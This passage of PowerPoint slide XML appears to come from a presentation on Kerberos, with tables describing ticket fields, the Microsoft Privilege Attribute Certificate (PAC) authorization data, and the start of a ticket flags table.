                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Time after which the ticket is valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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12"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="34942">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>End Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket's expiration time.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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13"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="68364">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Renew Till</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Maximum end time that can be set in a ticket with a RENEWABLE ticket flag.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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14"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="81733">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Address</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) One or more addresses from which the ticket can be used. If omitted, the ticket can be used from any address.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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15"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="318729">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Authorization-Data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1519" marR="1519" marT="1519" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) This field contains authorization data for the client.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In the Microsoft implementation, this field is significant because it contains the user's SID and the SIDs of groups the client belongs to—data which is used to build the client's access token (the privilege attributes for the client).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The Kerberos service does not interpret the contents of this field. Interpretation is left up to the service requesting credentials.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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16"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="正方形/長方形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272540" y="2211808"/>
            <a:ext cx="1471495" cy="3550969"/>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四角形吹き出し 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744035" y="5855044"/>
            <a:ext cx="2896950" cy="324665"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -59317"/>
              <a:gd name="adj2" fmla="val -99110"/>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400" dirty="0"/>
              <a:t>encrypted with Server Key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356975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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Authorization Data in Ticket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="コンテンツ プレースホルダー 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8393374" cy="2840377"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2438716">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5954658">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="88740">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="484089">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Credential information</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Information about the ticket and the client, such as Group IDs, which list relative IDs (RIDs) that belong to the client for his or her domain and groups.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="249041">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client information</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ensures that the ticket belongs to the client who is submitting it.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="249041">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Supplemental credentials</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Returned by the KDC service to enable PKINIT.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="719139">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Signatures</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The Microsoft authorization data contains two digital signatures, one for the domain controller and one for the server offering the service. These signatures are used to prevent clients or untrusted services from generating their own forged Microsoft authorization data.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="954189">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PAC-request pre-authentication data</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Normally, the Microsoft authorization data is included in every pre-authenticated ticket received from an AS request. However, a client can also explicitly request — with the privilege attribute certificate (PAC)-request pre-authentication data field — to include or not include SIDs. If the field is present, the account SIDs will be included. If the field is not present, SIDs will not be included.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="4582864"/>
            <a:ext cx="8225837" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="14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rgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
              <a:defRPr sz="14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rgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="14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rgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="14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rgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="14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pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PAC (Privilege Attribute Certificate)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a structure that conveys authorization-related information provided by DCs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" err="1">
              <a:ln w="3175">
                <a:noFill/>
              </a:ln>
              <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211983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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ticket Flags</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="コンテンツ プレースホルダー 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8379321" cy="4747147"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1744051">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="985901">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5649369">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Flag</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Value</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
